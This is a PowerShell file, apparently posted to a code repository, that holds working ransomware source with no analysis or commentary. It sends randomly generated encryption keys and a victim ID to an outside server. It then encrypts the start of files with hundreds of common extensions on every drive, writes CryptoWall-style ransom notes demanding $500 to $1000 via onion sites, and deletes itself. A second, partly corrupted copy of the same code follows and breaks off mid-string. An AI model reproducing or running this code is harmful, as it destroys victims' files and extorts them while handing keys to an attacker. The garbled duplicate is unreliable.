teejayen/crypto-variant.ps1

## crypto-variant.ps1
$BGDSXNJHGFGFUJNBFF = ([ChaR[]](GeT-RandOm -Input $(48..57 + 65..90 + 97..122) -Count 50)) -join ""
$ZXPIFWWDQHKJBG = ([ChaR[]](GeT-RandOm -Input $(48..57 + 65..90 + 97..122) -Count 20)) -join ""
$WKJYGBVDRHJJSDGHXWH = ([ChaR[]](GeT-RandOm -Input $(48..57 + 65..90 + 97..122) -Count 25)) -join ""
$XCJHEDIJGDFJMVD = "http://skycpa.in/pi.php"
$Bnx5kJhs55GjhsjdRgh = "string=$BGDSXNJHGFGFUJNBFF&string2=$ZXPIFWWDQHKJBG&uuid=$WKJYGBVDRHJJSDGHXWH"
$73848HhjhdRghx67Hhsh = New-Object -ComObject MsXml2.XMLHTTP
$73848HhjhdRghx67Hhsh.open('POST', $XCJHEDIJGDFJMVD, $false)
$73848HhjhdRghx67Hhsh.setRequestHeader("C"+"ontEnt-type",
"apPlication/x-www-form-url"+"enCodeD")
$73848HhjhdRghx67Hhsh.setRequestHeader("ConteNt-length", $post.length)
$73848HhjhdRghx67Hhsh.setRequestHeader("CoNNeCtion", "close")
$73848HhjhdRghx67Hhsh.send($Bnx5kJhs55GjhsjdRgh)
Start-Sleep 72
[byte[]]$Jjsnxxx68Gjs35=[system.Text.Encoding]::Unicode.GetBytes($BGDSXNJHGFGFUJNBFF)
$XXX = 37483 * 38
$84Fnx9j0Fhsjd3hK = [Text.Encoding]::UTF8.GetBytes($ZXPIFWWDQHKJBG)
$Bnx8Khahs3Hjx96 = new-Object System.Security.Cryptography.RijndaelManaged
$Bnx8Khahs3Hjx96.Key = (new-Object Security.Cryptography.Rfc2898DeriveBytes $BGDSXNJHGFGFUJNBFF, $84Fnx9j0Fhsjd3hK, 5).GetBytes(32)
$Bnx8Khahs3Hjx96.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]
$Bnx8Khahs3Hjx96.Padding="Zeros"
$Bnx8Khahs3Hjx96.Mode="CBC"
$22Jnxgcg965Gjs467= gdr|where {$_.Free}|Sort-Object -Descending
foreach($Bnx58hFgshd49 in $22Jnxgcg965Gjs467){
	gci $Bnx58hFgshd49.root -Recurse -Include "*.docx","*.xls","*.pdf","*.xlsx","*.mp3","*.jpeg","*.jpg","*.txt","*.rtf","*.doc","*.rar","*.zip","*.psd","*.tif","*.wma","*.gif","*.bmp","*.ppt","*.pptx","*.docm","*.xlsm","*.pps","*.ppsx","*.ppd","*.eps","*.png","*.ace","*.djvu","*.tar","*.cdr","*.max","*.wmv","*.avi","*.wav","*.mp4","*.pdd","*.php","*.aac","*.ac3","*.amr","*.dwg","*.dxf","*.accdb","*.mod","*.tax2013","*.tax2014","*.oga","*.ogg","*.pbf","*.ra","*.raw","*.saf","*.wave","*.wow","*.wpk","*.3g2","*.3gp","*.3gp2","*.3mm","*.amx","*.avs","*.bik","*.dir","*.divx","*.dvx","*.evo","*.flv","*.qtq","*.tch","*.rts","*.rum","*.rv","*.scn","*.srt","*.stx","*.svi","*.swf","*.trp","*.vdo","*.wm","*.wmd","*.wmmp","*.wmx","*.wvx","*.xvid","*.3d","*.3d4","*.3df8","*.pbs","*.adi","*.ais","*.amu","*.arr","*.bmc","*.bmf","*.cag","*.cam","*.dng","*.ink","*.jif","*.jiff","*.jpc","*.jpf","*.jpw","*.mag","*.mic","*.mip","*.msp","*.nav","*.ncd","*.odc","*.odi","*.opf","*.qif","*.xwd","*.abw","*.act","*.adt","*.aim","*.ans","*.asc","*.ase","*.bdp","*.bdr","*.bib","*.boc","*.crd","*.diz","*.dot","*.dotm","*.dotx","*.dvi","*.dxe","*.mlx","*.err","*.euc","*.faq","*.fdr","*.fds","*.gthr","*.idx","*.kwd","*.lp2","*.ltr","*.man","*.mbox","*.msg","*.nfo","*.now","*.odm","*.oft","*.pwi","*.rng","*.rtx","*.run","*.ssa","*.text","*.unx","*.wbk","*.wsh","*.7z","*.arc","*.ari","*.arj","*.car","*.cbr","*.cbz","*.gz","*.gzig","*.jgz","*.pak","*.pcv","*.puz","*.r00","*.r01","*.r02","*.r03","*.rev","*.sdn","*.sen","*.sfs","*.sfx","*.sh","*.shar","*.shr","*.sqx","*.tbz2","*.tg","*.tlz","*.vsi","*.wad","*.war","*.xpi","*.z02","*.z04","*.zap","*.zipx","*.zoo","*.ipa","*.isu","*.jar","*.js","*.udf","*.adr","*.ap","*.aro","*.asa","*.ascx","*.ashx","*.asmx","*.asp","*.indd","*.asr","*.qbb","*.bml","*.cer","*.cms","*.crt","*.dap","*.htm","*.moz","*.svr","*.url","*.wdgt","*.abk","*.bic","*.big","*.blp","*.bsp","*.cgf","*.chk","*.col","*.cty","*.dem","*.elf","*.ff","*.gam","*.grf","*.h3m","*.h4r","*.iwd","*.ldb","*.lgp","*.lvl","*.map","*.md3","*.mdl","*.mm6","*.mm7","*.mm8","*.nds","*.pbp","*.ppf","*.pwf","*.pxp","*.sad","*.sav","*.scm","*.scx","*.sdt","*.spr","*.sud","*.uax","*.umx","*.unr","*.uop","*.usa","*.usx","*.ut2","*.ut3","*.utc","*.utx","*.uvx","*.uxx","*.vmf","*.vtf","*.w3g","*.w3x","*.wtd","*.wtf","*.ccd","*.cd","*.cso","*.disk","*.dmg","*.dvd","*.fcd","*.flp","*.img","*.iso","*.isz","*.md0","*.md1","*.md2","*.mdf","*.mds","*.nrg","*.nri","*.vcd","*.vhd","*.snp","*.bkf","*.ade","*.adpb","*.dic","*.cch","*.ctt","*.dal","*.ddc","*.ddcx","*.dex","*.dif","*.dii","*.itdb","*.itl","*.kmz","*.lcd","*.lcf","*.mbx","*.mdn","*.odf","*.odp","*.ods","*.pab","*.pkb","*.pkh","*.pot","*.potx","*.pptm","*.psa","*.qdf","*.qel","*.rgn","*.rrt","*.rsw","*.rte","*.sdb","*.sdc","*.sds","*.sql","*.stt","*.t01","*.t03","*.t05","*.tcx","*.thmx","*.txd","*.txf","*.upoi","*.vmt","*.wks","*.wmdb","*.xl","*.xlc","*.xlr","*.xlsb","*.xltx","*.ltm","*.xlwx","*.mcd","*.cap","*.cc","*.cod","*.cp","*.cpp","*.cs","*.csi","*.dcp","*.dcu","*.dev","*.dob","*.dox","*.dpk","*.dpl","*.dpr","*.dsk","*.dsp","*.eql","*.ex","*.f90","*.fla","*.for","*.fpp","*.jav","*.java","*.lbi","*.owl","*.pl","*.plc","*.pli","*.pm","*.res","*.rsrc","*.so","*.swd","*.tpu","*.tpx","*.tu","*.tur","*.vc","*.yab","*.8ba","*.8bc","*.8be","*.8bf","*.8bi8","*.bi8","*.8bl","*.8bs","*.8bx","*.8by","*.8li","*.aip","*.amxx","*.ape","*.api","*.mxp","*.oxt","*.qpx","*.qtr","*.xla","*.xlam","*.xll","*.xlv","*.xpt","*.cfg","*.cwf","*.dbb","*.slt","*.bp2","*.bp3","*.bpl","*.clr","*.dbx","*.jc","*.potm","*.ppsm","*.prc","*.prt","*.shw","*.std","*.ver","*.wpl","*.xlm","*.yps","*.md3","*.1cd"|%{
		try{
			$mBbsjd7jFhjx467uj = New-Object System.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
			if ($mBbsjd7jFhjx467uj.BaseStream.Length -lt 2048){return}
			else
			{
                        $jshncGjsjd657h7gH = 2048
			}
                        $Jjsnxxx68Gjs35 = $mBbsjd7jFhjx467uj.ReadBytes($jshncGjsjd657h7gH)
			$mBbsjd7jFhjx467uj.Close()
			$BnbxnxcfRJjs76ijGg = $Bnx8Khahs3Hjx96.CreateEncryptor()
			$hxjjc4uHjsjcg49Jgh = new-Object IO.MemoryStream
			$892847HjsjkjmcnGjhj = new-Object Security.Cryptography.CryptoStream $hxjjc4uHjsjcg49Jgh,$BnbxnxcfRJjs76ijGg,"Write"
			$892847HjsjkjmcnGjhj.Write($Jjsnxxx68Gjs35, 0,$Jjsnxxx68Gjs35.Length)
			$892847HjsjkjmcnGjhj.Close()
			$hxjjc4uHjsjcg49Jgh.Close()
			$BnbxnxcfRJjs76ijGg.Clear()
			$Bnx587Fhsjc7ijF4 = $hxjjc4uHjsjcg49Jgh.ToArray()
			$7Ghbx46Gjsjd7jh3hH = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
			$7Ghbx46Gjsjd7jh3hH.Write($Bnx587Fhsjc7ijF4,0,$Bnx587Fhsjc7ijF4.Length)
			$7Ghbx46Gjsjd7jh3hH.Close()
			$XJJYHNBVDDGHJJJ = $_.Directory.ToString() + '\FILES_ENCRYPTED-READ_ME.HTML'
$Kjnx69456GFjjsRyh = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGh0bWw+DQo8dGl0bGU+Q3J5cHRvV2FsbCAtIEZpbGVzIEVuY3J5cHRlZCE8L3RpdGxlPg0KPHN0eWxlPg0KYSB7IGNvbG9yOmdyZWVuOyB9DQoudGIgeyAgYmFja2dyb3VuZDp3aGl0ZTsgYm9yZGVyLXN0eWxlOnNvbGlkOyBib3JkZXItd2lkdGg6MXB4OyBwYWRkaW5nOjNweDsgYm9yZGVyLWNvbG9yOmxpbWU7IH0NCi50dGwgeyBmb250LXNpemU6MTNweDsgY29sb3I6ODgwMDAwOyB9DQo8L3N0eWxlPg0KPGJvZHkgc3R5bGU9IndpZHRoOjEwMCU7IGJhY2tncm91bmQ6IzMzQ0NGRjsiPg0KICA8Y2VudGVyPg0KICA8ZGl2IHN0eWxlPSJ0ZXh0LWFsaWduOmxlZnQ7IGZvbnQtZmFtaWx5OkFyaWFsOyBmb250LXNpemU6MTNweDsgbGluZS1oZWlnaHQ6MjBweDsgbWFyZ2luLXRvcDoxMHB4OyB3aWR0aDo4MDBweDsgYmFja2dyb3VuZDojRjRGNEY0OyBwYWRkaW5nOjIwcHg7IGJvcmRlci1zdHlsZTpzb2xpZDsgYm9yZGVyLXdpZHRoOjVweDsgYm9yZGVyLWNvbG9yOiNCQUJBQkE7Ij4NCiAgICA8Yj48Zm9udCBjbGFzcz0idHRsIj5XaGF0IGhhcHBlbmVkIHRvIHlvdXIgZmlsZXM/PC9iPjwvZm9udD4NCiAgICA8YnI+DQogICAgPGZvbnQgc3R5bGU9ImZvbnQtc2l6ZToxM3B4OyI+QWxsIG9mIHlvdXIgZmlsZXMgd2VyZSBwcm90ZWN0ZWQgYnkgYSBzdHJvbmcgZW5jcnlwdGlvbiB3aXRoIFJTQS0yMDQ4Lg0KICAgIDxicj4NCiAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IHRoZSBlbmNyeXB0aW9uIGtleXMgdXNpbmcgUlNBLTIwNDggY2FuIGJlIGZvdW5kIGhlcmU6IDxhIGhyZWY9Imh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUlNBXyhjcnlwdG9zeXN0ZW0pIiB0YXJnZXQ9Il9ibGFuayI+aHR0cDovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9SU0FfKGNyeXB0b3N5c3RlbSk8L2E+PGJyPjwvZm9udD4NCiAgICA8YnI+DQogICAgPGI+PGZvbnQgY2xhc3M9InR0bCI+V2hhdCBkb2VzIHRoaXMgbWVhbj88L2I+PC9mb250Pg0KICAgIDxicj4NCiAgICA8Zm9udCBzdHlsZT0iZm9udC1zaXplOjEzcHg7Ij4NCiAgICAgIFRoaXMgbWVhbnMgdGhhdCB0aGUgc3RydWN0dXJlIGFuZCBkYXRhIHdpdGhpbiB5b3VyIGZpbGVzIGhhdmUgYmVlbiBpcnJldm9jYWJseSBjaGFuZ2VkLCB5b3Ugd2lsbCBub3QgYmUgYWJsZSB0byB3b3JrPGJyPiB3aXRoIHRoZW0sIHJlYWQgdGhlbSBvciBzZWUgdGhlbSwgaXQgaXMgdGhlIHNhbWUgdGhpbmcgYXMgbG9zaW5nIHRoZW0gZm9yZXZlciwgYnV0IHdpdGggb3VyIGhlbHAsIHlvdSBjYW4gcmVzdG9yZSB0aGVtLg0KICAgIDwvZm9udD4NCiAgICA8YnI+PGJyPg0KICAgIDxiPjxmb250IGNsYXNzPSJ0dGwiPkhvdyBkaWQgdGhpcyBoYXBwZW4/PC9iPjwvZm9udD4NCiAgICA8YnI+DQogICAgPGZvbnQgc3R5bGU9ImZvbnQtc2l6ZToxM3B4OyI+DQogICAgICBFc3BlY2lhbGx5IGZvciB5b3UsIG9uIG91ciBzZXJ2ZXIgd2FzIGdlbmVyYXRlZCB0aGUgc2VjcmV0IGtleSBwYWlyIFJTQS0yMDQ4IC0gcHVibGljIGFuZCBwcml2YXRlLg0KICAgICAgPGJyPg0KICAgICAgQWxsIHlvdXIgZmlsZXMgd2VyZSBlbmNyeXB0ZWQgd2l0aCB0aGUgcHVibGljIGtleSwgd2hpY2ggaGFzIGJlZW4gdHJhbnNmZXJyZWQgdG8geW91ciBjb21wdXRlciB2aWEgdGhlIEludGVybmV0Lg0KICAgICAgPGJyPg0KICAgICAgRGVjcnlwdGluZyBvZiB5b3VyIGZpbGVzIGlzIG9ubHkgcG9zc2libGUgd2l0aCB0aGUgaGVscCBvZiB0aGUgcHJpdmF0ZSBrZXkgYW5kIGRlY3J5cHQgcHJvZ3JhbSwgd2hpY2ggaXMgb24gb3VyIHNlY3JldCBzZXJ2ZXIuDQogICAgPC9mb250Pg0KICAgIDxicj48YnI+DQogICAgPGI+PGZvbnQgY2xhc3M9InR0bCI+V2hhdCBkbyBJIGRvPzwvYj48L2ZvbnQ+DQogICAgPGJyPg0KICAgIDxmb250IHN0eWxlPSJmb250LXNpemU6MTNweDsiPg0KICAgICAgQWxhcywgaWYgeW91IGRvIG5vdCB0YWtlIHRoZSBuZWNlc3NhcnkgbWVhc3VyZXMgZm9yIHRoZSBzcGVjaWZpZWQgdGltZSB0aGVuIHRoZSBjb25kaXRpb25zIGZvciBvYnRhaW5pbmcgdGhlIHByaXZhdGUga2V5IHdpbGwgYmUgY2hhbmdlZC4NCiAgICAgIDxicj4NCiAgICAgIElmIHlvdSByZWFsbHkgdmFsdWUgeW91ciBkYXRhLCB0aGVuIHdlIHN1Z2dlc3QgeW91IGRvIG5vdCB3YXN0ZSB2YWx1YWJsZSB0aW1lIHNlYXJjaGluZyBmb3Igb3RoZXIgc29sdXRpb25zIGJlY2F1c2UgdGhleSBkbyBub3QgZXhpc3QuDQogICAgPC9mb250Pg0KICAgIDxicj48YnI+DQogICAgPGRpdiBjbGFzcz0idGIiIHN0eWxlPSJjb2xvcjojODgwMDAwOyBmb250LXNpemU6MTNweDsgYm9yZGVyLXdpZHRoOjNweDsiPg0KICAgICAgRm9yIG1vcmUgc3BlY2lmaWMgaW5zdHJ1Y3Rpb25zLCBwbGVhc2UgdmlzaXQgdGhpcyBob21lIHBhZ2U6DQogICAgICA8aHI+DQogICAgICA8Yj4xLjxhIGhyZWY9Imh0dHA6Ly92MmFhaGdjYW42ZWQ1NjRwLm9uaW9uLm51IiB0YXJnZXQ9Il9ibGFuayI+aHR0cDovL3YyYWFoZ2NhbjZlZDU2NHAub25pb24ubnU8L2E+PC9iPg0KICAgICAgPGJyPg0KUGxlYXNlIHNjcm9sbCBiZWxvdyBmb3IgeW91ciAjVVVJRDwvYj4NCiAgICA8L2Rpdj4NCiAgICA8YnI+DQogICAgPGRpdiBjbGFzcz0idGIiIHN0eWxlPSJmb250LXNpemU6MTNweDsgYm9yZGVyLWNvbG9yOiM4ODAwMDA7Ij4NCiAgICAgIElmIGZvciBzb21lIHJlYXNvbnMgdGhlIGFkZHJlc3MgaXMgbm90IGF2YWlsYWJsZSwgZm9sbG93IHRoZXNlIHN0ZXBzOiA8aHI+DQogICAgICAxLiBEb3dubG9hZCBhbmQgaW5zdGFsbCB0b3ItYnJvd3NlcjogPGEgaHJlZj0iaHR0cDovL3d3dy50b3Jwcm9qZWN0Lm9yZy9wcm9qZWN0cy90b3Jicm93c2VyLmh0bWwuZW4iIHRhcmdldD0iX2JsYW5rIj5odHRwOi8vd3d3LnRvcnByb2plY3Qub3JnL3Byb2plY3RzL3RvcmJyb3dzZXIuaHRtbC5lbjwvYT48YnI+DQogICAgICAyLiBBZnRlciBhIHN1Y2Nlc3NmdWwgaW5zdGFsbGF0aW9uLCBydW4gdGhlIGJyb3dzZXIgYW5kIHdhaXQgZm9yIGluaXRpYWxpemF0aW9uLjxicj4NCiAgICAgIDMuIFR5cGUgaW4gdGhlIGFkZHJlc3MgYmFyOiA8Zm9udCBzdHlsZT0iZm9udC13ZWlnaHQ6Ym9sZDsgY29sb3I6IzAwOTk3NzsiPnYyYWFoZ2NhbjZlZDU2NHAub25pb248L2ZvbnQ+PGJyPg0KICAgICAgNC4gRm9sbG93IHRoZSBpbnN0cnVjdGlvbnMgb24gdGhlIHNpdGUuDQogICAgPC9kaXY+DQogICAgPGJyPg0KICAgIDxicj4NCiAgICA8Yj5JTVBPUlRBTlQgSU5GT1JNQVRJT046PC9iPjxicj4NCiAgICA8ZGl2IGNsYXNzPSJ0YiIgc3R5bGU9IndpZHRoOjc5MHB4OyI+DQogICAgICBZb3VyIEhvbWUgUEFHRTogPGI+PGEgaHJlZj0iaHR0cDovL3YyYWFoZ2NhbjZlZDU2NHAub25pb24ubnUiIHRhcmdldD0iX2JsYW5rIj5odHRwOi8vdjJhYWhnY2FuNmVkNTY0cC5vbmlvbi5udTwvYT48L2I+PGJyPg0KICAgICAgWW91ciBIb21lIFBBR0UodXNpbmcgVE9SKTogPGZvbnQgc3R5bGU9ImZvbnQtd2VpZ2h0OmJvbGQ7IGNvbG9yOiMwMDk5Nzc7Ij4zYWZkNTdjNGRjaHpwM3BlLm9uaW9uPC9mb250Pjxicj4NCiAgICAgIDxiPlBsZWFzZSBzY3JvbGwgYmVsb3cgZm9yIHlvdXIgI1VVSUQ8L2I+PGJyPg0KICAgIDwvZGl2Pg0KICA8L2Rpdj4NCiAgPC9jZW50ZXI+DQo8L2JvZHk+DQo8L2h0bWw+"));
			if(!(Test-path($XJJYHNBVDDGHJJJ))){
			New-Item -Path $XJJYHNBVDDGHJJJ -ItemType file -Value $Kjnx69456GFjjsRyh
			Add-Content -Path $XJJYHNBVDDGHJJJ -Value ("<p><h2>Your #UUID is $WKJYGBVDRHJJSDGHXWH</p></h2>")
			Add-Content -Path $XJJYHNBVDDGHJJJ -Value ('<p><h2>The price to obtain the decrypter goes from 500 $ to 1000 $ on the day of '+(Get-Date).AddDays(+10))
			}}
                catch
                {

                }
        }}
		function FHNVXETJJHDSDF() {
    $XSJKTGshdgRFHOOFDGH = (Get-Variable MyInvocation -Scope 1).Value
    $VBIOJHFRRHJNHGFG =  $XSJKTGshdgRFHOOFDGH.MyCommand.Path
    Remove-Item $VBIOJHFRRHJNHGFG
}
FHNVXETJJHDSDF㐲ㄴ
	$BGDSXNJHGFGFUJNBFF = ([ChaR[]](GeT-RandOm -Input $(48..57 + 65..90 + 97..122) -Count 50)) -join ""
	$ZXPIFWWDQHKJBG = ([ChaR[]](GeT-RandOm -Input $(48..57 + 65..90 + 97..122) -Count 20)) -join ""
	$WKJYGBVDRHJJSDGHXWH = ([ChaR[]](GeT-RandOm -Input $(48..57 + 65..90 + 97..122) -Count 25)) -join ""
	$XCJHEDIJGDFJMVD = "http://skycpa.in/pi.php"
	$Bnx5kJhs55GjhsjdRgh = "string=$BGDSXNJHGFGFUJNBFF&string2=$ZXPIFWWDQHKJBG&uuid=$WKJYGBVDRHJJSDGHXWH"
	$73848HhjhdRghx67Hhsh = New-Object -ComObject MsXml2.XMLHTTP
	$73848HhjhdRghx67Hhsh.open('POST', $XCJHEDIJGDFJMVD, $false)
	$73848HhjhdRghx67Hhsh.setRequestHeader("C"+"ontEnt-type",
	"apPlication/x-www-form-url"+"enCodeD")
	$73848HhjhdRghx67Hhsh.setRequestHeader("ConteNt-length", $post.length)
	$73848HhjhdRghx67Hhsh.setRequestHeader("CoNNeCtion", "close")
	$73848HhjhdRghx67Hhsh.send($Bnx5kJhs55GjhsjdRgh)
	Start-Sleep 72
	[byte[]]$Jjsnxxx68Gjs35=[system.Text.Encoding]::Unicode.GetBytes($BGDSXNJHGFGFUJNBFF)
	$XXX = 37483 * 38
	$84Fnx9j0Fhsjd3hK = [Text.Encoding]::UTF8.GetBytes($ZXPIFWWDQHKJBG)
	$Bnx8Khahs3Hjx96 = new-Object System.Security.Cryptography.RijndaelManaged
	$Bnx8Khahs3Hjx96.Key = (new-Object Security.Cryptography.Rfc2898DeriveBytes $BGDSXNJHGFGFUJNBFF, $84Fnx9j0Fhsjd3hK, 5).GetBytes(32)
	$Bnx8Khahs3Hjx96.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]
	$Bnx8Khahs3Hjx96.Padding="Zeros"
	$Bnx8Khahs3Hjx96.Mode="CBC"
	$22Jnxgcg965Gjs467= gdr\|where {$_.Free}\|Sort-Object -Descending
	foreach($Bnx58hFgshd49 in $22Jnxgcg965Gjs467){
	gci $Bnx58hFgshd49.root -Recurse -Include ".docx",".xls",".pdf",".xlsx",".mp3",".jpeg",".jpg",".txt",".rtf",".doc",".rar",".zip",".psd",".tif",".wma",".gif",".bmp",".ppt",".pptx",".docm",".xlsm",".pps",".ppsx",".ppd",".eps",".png",".ace",".djvu",".tar",".cdr",".max",".wmv",".avi",".wav",".mp4",".pdd",".php",".aac",".ac3",".amr",".dwg",".dxf",".accdb",".mod",".tax2013",".tax2014",".oga",".ogg",".pbf",".ra",".raw",".saf",".wave",".wow",".wpk",".3g2",".3gp",".3gp2",".3mm",".amx",".avs",".bik",".dir",".divx",".dvx",".evo",".flv",".qtq",".tch",".rts",".rum",".rv",".scn",".srt",".stx",".svi",".swf",".trp",".vdo",".wm",".wmd",".wmmp",".wmx",".wvx",".xvid",".3d",".3d4",".3df8",".pbs",".adi",".ais",".amu",".arr",".bmc",".bmf",".cag",".cam",".dng",".ink",".jif",".jiff",".jpc",".jpf",".jpw",".mag",".mic",".mip",".msp",".nav",".ncd",".odc",".odi",".opf",".qif",".xwd",".abw",".act",".adt",".aim",".ans",".asc",".ase",".bdp",".bdr",".bib",".boc",".crd",".diz",".dot",".dotm",".dotx",".dvi",".dxe",".mlx",".err",".euc",".faq",".fdr",".fds",".gthr",".idx",".kwd",".lp2",".ltr",".man",".mbox",".msg",".nfo",".now",".odm",".oft",".pwi",".rng",".rtx",".run",".ssa",".text",".unx",".wbk",".wsh",".7z",".arc",".ari",".arj",".car",".cbr",".cbz",".gz",".gzig",".jgz",".pak",".pcv",".puz",".r00",".r01",".r02",".r03",".rev",".sdn",".sen",".sfs",".sfx",".sh",".shar",".shr",".sqx",".tbz2",".tg",".tlz",".vsi",".wad",".war",".xpi",".z02",".z04",".zap",".zipx",".zoo",".ipa",".isu",".jar",".js",".udf",".adr",".ap",".aro",".asa",".ascx",".ashx",".asmx",".asp",".indd",".asr",".qbb",".bml",".cer",".cms",".crt",".dap",".htm",".moz",".svr",".url",".wdgt",".abk",".bic",".big",".blp",".bsp",".cgf",".chk",".col",".cty",".dem",".elf",".ff",".gam",".grf",".h3m",".h4r",".iwd",".ldb",".lgp",".lvl",".map",".md3",".mdl",".mm6",".mm7",".mm8",".nds",".pbp",".ppf",".pwf",".pxp",".sad",".sav",".scm",".scx",".sdt",".spr",".sud",".uax",".umx",".unr",".uop",".usa",".usx",".ut2",".ut3",".utc",".utx",".uvx",".uxx",".vmf",".vtf",".w3g",".w3x",".wtd",".wtf",".ccd",".cd",".cso",".disk",".dmg",".dvd",".fcd",".flp",".img",".iso",".isz",".md0",".md1",".md2",".mdf",".mds",".nrg",".nri",".vcd",".vhd",".snp",".bkf",".ade",".adpb",".dic",".cch",".ctt",".dal",".ddc",".ddcx",".dex",".dif",".dii",".itdb",".itl",".kmz",".lcd",".lcf",".mbx",".mdn",".odf",".odp",".ods",".pab",".pkb",".pkh",".pot",".potx",".pptm",".psa",".qdf",".qel",".rgn",".rrt",".rsw",".rte",".sdb",".sdc",".sds",".sql",".stt",".t01",".t03",".t05",".tcx",".thmx",".txd",".txf",".upoi",".vmt",".wks",".wmdb",".xl",".xlc",".xlr",".xlsb",".xltx",".ltm",".xlwx",".mcd",".cap",".cc",".cod",".cp",".cpp",".cs",".csi",".dcp",".dcu",".dev",".dob",".dox",".dpk",".dpl",".dpr",".dsk",".dsp",".eql",".ex",".f90",".fla",".for",".fpp",".jav",".java",".lbi",".owl",".pl",".plc",".pli",".pm",".res",".rsrc",".so",".swd",".tpu",".tpx",".tu",".tur",".vc",".yab",".8ba",".8bc",".8be",".8bf",".8bi8",".bi8",".8bl",".8bs",".8bx",".8by",".8li",".aip",".amxx",".ape",".api",".mxp",".oxt",".qpx",".qtr",".xla",".xlam",".xll",".xlv",".xpt",".cfg",".cwf",".dbb",".slt",".bp2",".bp3",".bpl",".clr",".dbx",".jc",".potm",".ppsm",".prc",".prt",".shw",".std",".ver",".wpl",".xlm",".yps",".md3","*.1cd"\|%{
	try{
	$mBbsjd7jFhjx467uj = New-Object System.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
	if ($mBbsjd7jFhjx467uj.BaseStream.Length -lt 2048){return}
	else
	{
	$jshncGjsjd657h7gH = 2048
	}
	$Jjsnxxx68Gjs35 = $mBbsjd7jFhjx467uj.ReadBytes($jshncGjsjd657h7gH)
	$mBbsjd7jFhjx467uj.Close()
	$BnbxnxcfRJjs76ijGg = $Bnx8Khahs3Hjx96.CreateEncryptor()
	$hxjjc4uHjsjcg49Jgh = new-Object IO.MemoryStream
	$892847HjsjkjmcnGjhj = new-Object Security.Cryptography.CryptoStream $hxjjc4uHjsjcg49Jgh,$BnbxnxcfRJjs76ijGg,"Write"
	$892847HjsjkjmcnGjhj.Write($Jjsnxxx68Gjs35, 0,$Jjsnxxx68Gjs35.Length)
	$892847HjsjkjmcnGjhj.Close()
	$hxjjc4uHjsjcg49Jgh.Close()
	$BnbxnxcfRJjs76ijGg.Clear()
	$Bnx587Fhsjc7ijF4 = $hxjjc4uHjsjcg49Jgh.ToArray()
	$7Ghbx46Gjsjd7jh3hH = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
	$7Ghbx46Gjsjd7jh3hH.Write($Bnx587Fhsjc7ijF4,0,$Bnx587Fhsjc7ijF4.Length)
	$7Ghbx46Gjsjd7jh3hH.Close()
	$XJJYHNBVDDGHJJJ = $_.Directory.ToString() + '\FILES_ENCRYPTED-READ_ME.HTML'
	$Kjnx69456GFjjsRyh = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGh0bWw+DQo8dGl0bGU+Q3J5cHRvV2FsbCAtIEZpbGVzIEVuY3J5cHRlZCE8L3RpdGxlPg0KPHN0eWxlPg0KYSB7IGNvbG9yOmdyZWVuOyB9DQoudGIgeyAgYmFja2dyb3VuZDp3aGl0ZTsgYm9yZGVyLXN0eWxlOnNvbGlkOyBib3JkZXItd2lkdGg6MXB4OyBwYWRkaW5nOjNweDsgYm9yZGVyLWNvbG9yOmxpbWU7IH0NCi50dGwgeyBmb250LXNpemU6MTNweDsgY29sb3I6ODgwMDAwOyB9DQo8L3N0eWxlPg0KPGJvZHkgc3R5bGU9IndpZHRoOjEwMCU7IGJhY2tncm91bmQ6IzMzQ0NGRjsiPg0KICA8Y2VudGVyPg0KICA8ZGl2IHN0eWxlPSJ0ZXh0LWFsaWduOmxlZnQ7IGZvbnQtZmFtaWx5OkFyaWFsOyBmb250LXNpemU6MTNweDsgbGluZS1oZWlnaHQ6MjBweDsgbWFyZ2luLXRvcDoxMHB4OyB3aWR0aDo4MDBweDsgYmFja2dyb3VuZDojRjRGNEY0OyBwYWRkaW5nOjIwcHg7IGJvcmRlci1zdHlsZTpzb2xpZDsgYm9yZGVyLXdpZHRoOjVweDsgYm9yZGVyLWNvbG9yOiNCQUJBQkE7Ij4NCiAgICA8Yj48Zm9udCBjbGFzcz0idHRsIj5XaGF0IGhhcHBlbmVkIHRvIHlvdXIgZmlsZXM/PC9iPjwvZm9udD4NCiAgICA8YnI+DQogICAgPGZvbnQgc3R5bGU9ImZvbnQtc2l6ZToxM3B4OyI+QWxsIG9mIHlvdXIgZmlsZXMgd2VyZSBwcm90ZWN0ZWQgYnkgYSBzdHJvbmcgZW5jcnlwdGlvbiB3aXRoIFJTQS0yMDQ4Lg0KICAgIDxicj4NCiAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IHRoZSBlbmNyeXB0aW9uIGtleXMgdXNpbmcgUlNBLTIwNDggY2FuIGJlIGZvdW5kIGhlcmU6IDxhIGhyZWY9Imh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUlNBXyhjcnlwdG9zeXN0ZW0pIiB0YXJnZXQ9Il9ibGFuayI+aHR0cDovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9SU0FfKGNyeXB0b3N5c3RlbSk8L2E+PGJyPjwvZm9udD4NCiAgICA8YnI+DQogICAgPGI+PGZvbnQgY2xhc3M9InR0bCI+V2hhdCBkb2VzIHRoaXMgbWVhbj88L2I+PC9mb250Pg0KICAgIDxicj4NCiAgICA8Zm9udCBzdHlsZT0iZm9udC1zaXplOjEzcHg7Ij4NCiAgICAgIFRoaXMgbWVhbnMgdGhhdCB0aGUgc3RydWN0dXJlIGFuZCBkYXRhIHd